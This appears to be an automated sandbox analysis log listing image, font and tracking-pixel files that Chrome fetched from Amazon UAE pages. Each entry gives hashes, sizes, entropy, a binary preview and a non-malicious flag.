                                                                                                                                                                                                        MD5:6BB72D6428F09405FB49B776DA466BB6
                                                                                                                                                                                                        SHA1:27852A923010893FFCD1F56F97EEE87BF009F028
                                                                                                                                                                                                        SHA-256:D9F11BC44492A6AD889A50BAB710116489BD9137481526B7503FE9BBC6D3ACD7
                                                                                                                                                                                                        SHA-512:C8D588AB1D972475D3009D262BC11435D8B3770593B9E4A9B9878DA42AB219CD4D06AD8141BE32AC339F732B938DFAC81367D1BA71181080FAF20C359A26BE77
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61czlYZjf2L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........W.."...............................................................1..!AQq.."Sa....2......#3BCDTr...R...cs..............................................1A!.............?..R.......d...Q.I...(......,H..E@..9..{9m&.+sp....\\q,":.. RK0n...o..do....J..d..F...E.#R.&...(.M.[.......K.{f..&.hJ.....~.x.^vn...h.L.....[.E..VE..S..9~J6_/..b...k.?....U..K\......{c.7....f...#.F.q.j.|....{).-[..U.....h.....t.6...3......'n.....y....j+.vr]...Y.dZ.u..g....P.....4@.vfF...2...Q...S.\...QM..L%[y.d..9$.'F=,....E*ie.WI.....;{.+.....3.{........*.Ej..el5=.pw.....^..#.....L.{...+..K}j.b...5...yp.../.*...g..:.OJ...m#...L..y.^o....Eds..;X..:H........_............. "...w.......h;.;s7?4.zId?.U.....I.6.....%z.:.{.]=t.."5...1w..BB..{.R..5+"...."Q..u.Q.._G...J.8.......!$gG...=.\...k..jWU&.....#..,..q...|....jq..@..,f0.`R..n.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2459
                                                                                                                                                                                                        Entropy (8bit):7.773202505765292
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rsVH4QFB7ZGr+aSkce3P7iVAJ1gt0KlMO1VAO/87RTGQT42H6Lp:TDVYeVGr+6OeJ1cr1SegRP4CG
                                                                                                                                                                                                        MD5:9ACFC70C73C81EDF49C053BD561E457E
                                                                                                                                                                                                        SHA1:39FF0ED0EA662B9BD0DF215C03BED98BC0939FDB
                                                                                                                                                                                                        SHA-256:AF51AA74C20F9BA123782B6061B655E2BA41C1B8987FA7A79167DE344859B757
                                                                                                                                                                                                        SHA-512:C6A5FE987DE1387E9F4C286A9D1AD4C0E3E68722E0A2DF6F404E031B4369CFEDC52EB88E806D6541C600C5DA938628C593E1DE17166822A72E4686BC4CF6BB9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1"2AQ....3BUaqrs...4Rb...t....5CEc.............................................!"1..............?...D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.E..VB..#...K.....IA..........b..:.Os.R....$..&..v.c....,.`..."y..'...:.Pi....[...o..o..kF.i...CbO....j%.%ff....7k.!.PA..W>f.w#..!UOy...N.,.;NA.._...\.1.....:JIo..{.]L ;.k.A... ""." "/...N........%EC.q......>_..7.|..C!......s.LNj..R....f`O....Q.Y-C...!.H........ .,.j.m.KA[..^B.......G6.l...U]..AS,...2`.......h.n..$q..W..B......7,`;.u....Z`ig*L....6V...h.C./..~.U...3.xV7..Q...p....y5.(.O..J_..$.c'...*..e.d4..f...#......w@.A..i'...(.l..C{N.$a...b..e......%..`...nL..k...A.... a./..:.Tr...w.,-y.U3...C..m....3*$...T../i..~R...c......#..'Q.W.$.>A..rm...:.6.W..ohT5t.../h......K..G.?...............Zu..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4072
                                                                                                                                                                                                        Entropy (8bit):7.888397106305945
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TXQJgzPTmNexoBspjjXct2W7SreH5eowny:rugHmEvpjjyPye3wny
                                                                                                                                                                                                        MD5:E26ED59D8161ABFA9A692705BADD445A
                                                                                                                                                                                                        SHA1:5A6960C4148B5332B642D6964ED122045DE824E8
                                                                                                                                                                                                        SHA-256:41CB93569CEEEEF294AFD9AC7769ADD2407825B0A706796A1E035059DEEC3D6F
                                                                                                                                                                                                        SHA-512:ECA48C1E3F935136850B8487BE22A02DFE1E7B8585C430B25DC30ACE82B11998C127110E03DB080005B2AF67EFF9C890301D2D497F208A8C35EE066551D92A29
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1.."Qa2Aq...S..#3BT......$%Cbs.....5D.....................................................!1...Qa....Aqr.."#.BR.............?....K.C.yW:.df..v....OOOJ.R.....!S=..JVjVHb...p...M=..B...%4...#C8...,...w......#.....3^W.....H.D.3l.x#..eQ......or...[x......)].B.)c[.]..A,K..... ...L.t...UN9..3Y.b.Q.1Y... ....c.4.)..)J@2)JR..)H......FA..V9.<.=:.v.'Q..[....{f;.......H.+..n..+....S.1.f.;W....R1Un.|.S..N*Y}2..L...[k........z...>.S...9Z..v"g=.....,.W.O$.@....*.u*1.=..q..F...,.......`.Ec.+.c/....H.!}T)....@..w/kr..v.2.v..|.\....!YfS.$..jit~.QZ.....K.v.Sq..>..Q.......!o.e.5..e$#s....p]I...S{5].(..bG.+_.g..f.x.`..>.O......{....D...|..d..[.......[..y/r......H$.......m..i..g..vN.y.`.t...G........uncbTx|......DQ.G.&-.v..U_h...&n._a....'.#.Z....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 65400, version 1.19661
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):65400
                                                                                                                                                                                                        Entropy (8bit):7.995681509823362
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:msfO1TqlmnlfgjCcFQkk7wd6sX37kbV4AKB:nfOclmlo2cFQkk70Y4VB
                                                                                                                                                                                                        MD5:68658972CEF5823AAA45770AD15DF48E
                                                                                                                                                                                                        SHA1:B7B102C865F7F9FD7E161BD6795147421A8E6CFD
                                                                                                                                                                                                        SHA-256:FAE8D9892169EDC72006FBC01C8A55C20C98DDD38F1FB927E817D290F398CA92
                                                                                                                                                                                                        SHA-512:59D3991F1F4B1D53ACE39E1B9C00E3C66DD6EB4A7C5E19F7168EA2C8BA401264A650B2CDFF859566C51E5F12C773BCE63F8D33A7ABF48B888E0BE6C4BF87EFF4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/01/wg/assets/fonts/AmazonEmber_W_Bd.woff2
                                                                                                                                                                                                        Preview:wOF2.......x......$L......L.......................n...Z.....`..J..............6.$..P..j.. ..8. ..[5.........M.[.....s.I.JKQ.}?.....xZ.3.F....2...`.................................#.l.....(...........2d......r1FuH\."...R....zuc........-..S=....e@.....d..)......N,...l.p...e._&........z..w..l..`...f.!.....{.3..p3+j....3.]o.n..6#.o.%.QJ..+r.3.Rr!.Op1.@..(..p.,s. ...D..a...]t..s...BEO7.bz>`...x/VeQD...D..B.,..M..M..,.X.w..4M.V.....c.. ....4........ .Z..A_ym-;...I..,...{+...K....H..X..6.W.2.....d;.....b.$k..!+...\.>J..m1.6y*....\.o.|.........q+M.-...'.Ur(.-.B..@|e..*xSn.;.......R.(..3.?.G|Y.aRn/y..........K....eG......j...}r$.P......&+A..._J.;s..k0.74.W....Z.....<.1.I.'....?<....$......*O.dc..M...._....7...y].e,h.b.%.9H.w6q..?.$..^.w..e.c.8.~.....?.?....?}.nO..{q\.sL....>Y...+......Q..w.t..7u........ D..l2....P5Z..0go.v.......".Zj.C..{]...O..=.=.g.p.....A.`OZ......QCB....\+.Zs.WZ..\...RIi..b.(...l..b...o..|.Ul...........y<=..'..F..3w..$..o..Z!$..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4253
                                                                                                                                                                                                        Entropy (8bit):7.693159834492515
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R9sgEkq/xzahDr8TLnhZwIQt1fxP22K31IHasx2edONy/:87zaqrQt1fxuGx5
                                                                                                                                                                                                        MD5:A17C20E8E0813DD095428B78562E3A11
                                                                                                                                                                                                        SHA1:83D3E5D255AA47ED2821C564BAD2E9CA8C28BDF9
                                                                                                                                                                                                        SHA-256:CA4FCE334F0ADC538E66E64DB009C947055188644AB5BD2999744A256E7A94FA
                                                                                                                                                                                                        SHA-512:7E1DB7571FAB8AE3D4C78F04EF60D08C67575273B5FAE9A3B030783421B775E78DC089A5DB5933BAC27F15CBB5E1C5F0CC83A2A16311608BA495B14A79A30A3D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6A87C8B9478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6A87C8B8478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="D123D7C80C3A5A9537F33E55F4397EA3" stRef:documentID="D123D7C80C3A5A9537F33E55F4397EA3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d...................f....................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4521
                                                                                                                                                                                                        Entropy (8bit):7.8120881867521925
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LUGuCloDgu088d96JMa7oV3wySlszcHsQVZY+oFqT5DV82:LUGudgndd0J17SyFMQVZYUr1
                                                                                                                                                                                                        MD5:EDBCD73DB073CECBD97B7A4A9B63286F
                                                                                                                                                                                                        SHA1:2F9FF0AAA3C47AEE01A17772FF56C736476CA5E2
                                                                                                                                                                                                        SHA-256:00225623C559C59037352A965875DE2865D043398AF152F76A36ACE7E2EE86FF
                                                                                                                                                                                                        SHA-512:78176D6580664DF74260E03485EE3A261677FF2A4F99EAF2729A6176FF3226B1E208432076CA9667F298EDA4641BCB403505697DB9A68EF3473AF492CC148E63
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b......A........;..*.7..h!J.=..=......3.4.T..a...z...d.ua......ZCo..z.&.-xTZ.j...D..i.......n,.e;....R.......T...............2Q(.e..o.]....oJ...k.......z.\f1<...]..;.".R...z.....Fq7.F..w$Q...A+...2.........-h.Z....6....v.v..lb.' ..@.R.z.9..y...q\...ez@...C.....k..|......%.F...s....|r.~C................T.............................!1...$%5AEU..&0equ."'4DFQRT..... @Prv.....6BVWa..............?.....j.6&..V8/....~.,.....5..--........Y..PZt..m........R.O......l..-S.G+.......SW.... .....B..n...m+P[M..!...........-........p.*..O~..<.O.@U'..}..1..1...f...;..dD..>.......5$.........l6..... ,F..P.$Z.n.._/..(.5....L...-.qC.c.p$......].gf.^..+....nN...p.fI?.....5X..:..j....=&..6m..Gy.]..s..",qC.<.a....P..1
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 311x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14549
                                                                                                                                                                                                        Entropy (8bit):7.947295602060146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:h+/s1RcJnFw9z6Zug0GNZ+0EKUvhghfbBShEm:h8sjcbw9u0Z0E7ChFZm
                                                                                                                                                                                                        MD5:A06419FB5CC93445F39BC886CD08706B
                                                                                                                                                                                                        SHA1:A6D28FE2116837A154A6887AC33E21AA946503FC
                                                                                                                                                                                                        SHA-256:BC47A932224C6A3A7A56597252912671F191E8383BED486F8CAA01A0814D9ACC
                                                                                                                                                                                                        SHA-512:AABB3A2013E7F4ADF3A793E2CA6021660A8D78CF8DA181CFDCF82C3DF8C2BB675A81B077B2A7F8CC22F19AD4F90E0631E3E9C6DD54F6C35E90110D1EBC769E9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........7.."..........6...............................................................................u......`..s.D..,r+$..v~J..za.. ...Y.ff.4A.j..2...8.|./E....}.J...b.9...N.8....C.*..=".F.f.i..5.f.*.0......$.u.wD..1..f..K_yqG!..p.5q........z+.<....r....Y......V....J./sFX..}.`....z5f..z.....!.......w.+......o.%..B.........Hk.VX.5..._-.fgE.V.....v3.../.:[...z..>.).=..g....uK.c.....tF]jZ.;V.....3n.......?..h... ..d0!...f.j..V...kw~P...b.6...Os........s.=M..&...T.U........M.N!.a).!.*...q...].[...k.S4/.;..zp..(.N...x.:8.{.$.*.).[...E+K..a....<.[~0..^P.f..Ja..1.....".b.Z.no.P..`.f..y.-..1..=$b..S.c...D....f4.6n........us....U..UV%...O...].....k.z.^.j.........d.pw.T....V../.v.j.F.T.S......X..6..NlN..c..a.......#<.y.iF..K..w....n.#'.....(...X..|/..R....9.>._R=..b.n..K.F.#.....$2h.Im.D.zU -...\...E.x.Y.^.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1599
                                                                                                                                                                                                        Entropy (8bit):7.544935724436636
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6v2bWPXa9bS7/RabWbFpD5g83FxL1WybbbR:TZv2bWfa2/MbWbFpD5FDUybbbR
                                                                                                                                                                                                        MD5:7E3BE9F05D717AA9B5B8EFF87A0DB2ED
                                                                                                                                                                                                        SHA1:FA4129AEAF2B91E5B9009176F318CE1A93F53BD7
                                                                                                                                                                                                        SHA-256:8B4A307A0EA37F59D262F1209CD84A84FCCD4613335A97D9BD7D232646C610A4
                                                                                                                                                                                                        SHA-512:A0DBA04BCFAB074F305FAC0F8F50C98919CD21B1BD7FCD1210D87BA4C3E42408F28BD003A5946D3246BD3C448FB5EAD2BC4FFB318E8E4040F6B4100DD32901DF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x......................................................!1Q.q.."ARab....#2BSc..$s...................................................?...D@DD.D@DD.UZ.j.f...N.!.i......o........fV.)W..e.F..v.,q..0B..p%.................j}..J...j....[..N.&....Vcf.-.a...{...Ihk.=.......a..../..7.......#.-.PqA..s.Q..3.jF.."dM..'...j..t.{3\.....+....................B.Q.r.L.............I..........p...F....4.@,...e.J.67r.]....;.v..)...Y..(f./.A....F....}.._6.....l^.5..;...(={7..0*RL4..y..a.E6V..!c".h.5.h..4...D@DD.D@DD.D@X.n...=...p.......`....X(...N.y.X.(:9..<...i.].._...:..b......78..:.}$.Z"..%X...v-.....C=..3..F....cX.0.V....2@...w...S.:.2...Lz.1.....@.H...............`.......].b..P...p&I.f0_...R...!.]..B....4..\yV+jc..lL....,.N.........X1..F.._+...u.-..B?.....R..9..o...+..<......K..............\...P.?..i..O
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 379x304, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23454
                                                                                                                                                                                                        Entropy (8bit):7.960066050617329
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:362XylC7saGwgkGOYIChPIQWFzBUz2jj2KKEqGybtQNL5Vn8XN9HGUx4fjhsizyD:3slCYXwgJOY90jjhKEqGymL5+99TuhjQ
                                                                                                                                                                                                        MD5:D63CD26924F97276B0E35C239A8EF3AA
                                                                                                                                                                                                        SHA1:27CB6AE43751E84805B9F5840DF93BB19E099EDC
                                                                                                                                                                                                        SHA-256:C04CBBE569EA56DC1AB5BF5E0857A0ACFCE9A030E4DB5D4AF42CA4FDFF4C51C8
                                                                                                                                                                                                        SHA-512:22723EA8A6BFCA3842B8A89CC75BF644AAAEB66D7C4F6B9B7128AAF4F2B9A7B38E50E68EA5E15FEE5FD30DF3221F2049854D9CEA4997E51C5B48A7D8A0D0A0CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......=......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:FC03975124CB11EFA30E8F55AA993B0A" xmpMM:InstanceID="xmp.iid:FC03975024CB11EFA30E8F55AA993B0A" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="2AD725D48FD3018F515EAE113945F37E" stRef:documentID="2AD725D48FD3018F515EAE113945F37E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26sw%3D1280%26sh%3D1024%26vw%3D1280%26vh%3D907%26m%3D1%26sc%3D0RPFFN4XC9JAK0QN8ZQ4%26ue%3D5%26bb%3D58%26be%3D358%26fp%3D418%26fcp%3D418%26pc%3D2627%26tc%3D-517%26na_%3D-517%26ul_%3D-1723729116529%26_ul%3D-1723729116529%26rd_%3D-1723729116529%26_rd%3D-1723729116529%26fe_%3D-513%26lk_%3D-467%26_lk%3D-467%26co_%3D-467%26_co%3D-388%26sc_%3D-467%26rq_%3D-388%26rs_%3D-46%26_rs%3D408%26dl_%3D-39%26di_%3D418%26de_%3D418%26_de%3D425%26_dc%3D2626%26ld_%3D2627%26_ld%3D-1723729116529%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D4%26hoe%3D5%26ld%3D2628%26t%3D1723729119157%26ctb%3D1%26rt%3D__ld%3A12-10-2-0-2-4-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsActive%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7CFWCIMEnabled%7Ccsm-feature-touch-enabled%3Afalse%26viz%3Dvisible%3A5%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:2629
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x177, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6590
                                                                                                                                                                                                        Entropy (8bit):7.865882655266746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:B+3e/e46+Hs45BtssZFAyHwc0LbiQd4gnz:0we4jHsyBrXyxZz
                                                                                                                                                                                                        MD5:8FABCD2AF0CAEC5CF6B77D91607AE882
                                                                                                                                                                                                        SHA1:C3CB877D9F35C52EDA97339D0C1CCC60444F8DC6
                                                                                                                                                                                                        SHA-256:73F0ABC98149445FB2B53A7E0BD9CDC635CFF8F2E27389A37F30E5C09034BAE7
                                                                                                                                                                                                        SHA-512:FBEDF8FDE609FAA2FC0E5F0BE2700B40E598B26F143143E0FE338C0CEFBAD4757C689D76F5272076D700711C85A818C8D1056BD51A398EB794C4D97A2B6C178C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4............................................................................g.a.a/..m....`.`.......$m.F......&Fv}...a..q{.kd[...}_...\/..../a.'@....>..wF..._F_...).k69..rGwRm...}..<...L..3D...X.H...C4Q...c............;..N..A......Y...fo$>F...z1r.@..Q.y.|.~.ut-..un.........|.`eW...~|bg...o...R.........-..X;:..J.cd..#..B.+..-.%o...;......'O..~......03.j........1...[...'.:*...tZ.....%Qgh..vq..-be.........eYG....8$.q...aA_..>....5+.zj....m...[:...>.7........=kC.r..0...Mx.-5.f.B.=k..i<.....f...g'.'P*7tt../ko.^=...!.Y1..?f.osr{.."....-.W..f@.....UL.z.m......z........!.Ni.?+].r.......}.e........m..t.H...>V......e`.........y.=.@........-.........................!"1.. 02@.3A.BCPQR...........'1...c..k.*.....$...W.....|.iv{9a...,...]..m..Z..A..ol..*......hg.5.1......I>........9..3K. ...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):14550
                                                                                                                                                                                                        Entropy (8bit):7.920838096694284
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:umSOhztXK7rPJFKyTjkLlGtOFX0MNM+gsH7GhUg:umFL67dTjkxTF8+M
                                                                                                                                                                                                        MD5:0369B2E96204F994F71A6C79D7ECEC02
                                                                                                                                                                                                        SHA1:D3B157365DA06466A04EA1A2C2E9717C822C292D
                                                                                                                                                                                                        SHA-256:1234F84F8F47660B81A577F0947F8509C3BF07857C9C13D22665A64281D3A71D
                                                                                                                                                                                                        SHA-512:77409D4C3873D9E30CECD678AEDA707F3AFF99E8055F55B5B9C53BEA09B506FA6C2BF33DC3064A496FDD472D8D1745A3333B68905AE671881259A6CCF4033FA5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259753_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2............................................................................OU....v.O..@.(H~~.............=mv.....\...o.H....TGco;5.u.u-..$.*.........|g...............:.9...e}..!(......<....^.r@..............~.o..YH....9....<L>.:............Ni:g.y.........$#..y..t.........................Y.q.(..........CQ._q.............Z......p.8w...#..._.~...8.\B.m:)ts3.~....Z........{D.....{{h..3k.t=.n.yae@s.[Td... 1.xvU.....V7y.U..5>t.x...L..g1U.......<.......U.&..............k...G..........YeR}..e.6.1..Ek.r.T.6|0z.Y=/....u..y._:...V.F..m.....ka^;...#...N.s....q?{.;......@..........q..s.B.4...n.:.*.yWm.....hY....+i....{(n.SG.c...aS.E8.B.]...s.3z..6....A"...R..3... ....{.uz.....fgq[.....m3t..j..N...d;...h.q...US_..4.6..-.:j.j......ZZS.m.T.4................Q....Mef.?;...u....d..N.5.mIl!.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2864
                                                                                                                                                                                                        Entropy (8bit):7.825366417868477
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6kHx3N3TsHzdZfNe2lEDQ8nxGh4KWfX9NJDHFLlkBVNovu8bbbbbD:TMHTjsHvNeSqQ8nxFKWfFDdlkzN4Rbbf
                                                                                                                                                                                                        MD5:3531AC69666646AC7B337B6E27651AC1
                                                                                                                                                                                                        SHA1:6A889B3974DFFCA4A7BB10E7948CFD8932C8C664
                                                                                                                                                                                                        SHA-256:B8CEB8727FDF03B6CB42F3FEC61C5BC819A89CF1C2797E79BC1344BDC241FF93
                                                                                                                                                                                                        SHA-512:BDF212C15659B5C11FD4F36808C6F370B32839D611157CD1D46740F0CF6FEF62402ED9B61C89A5E16AC047D36595B795126213A65B9F18EDEA86586FF682D491
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg
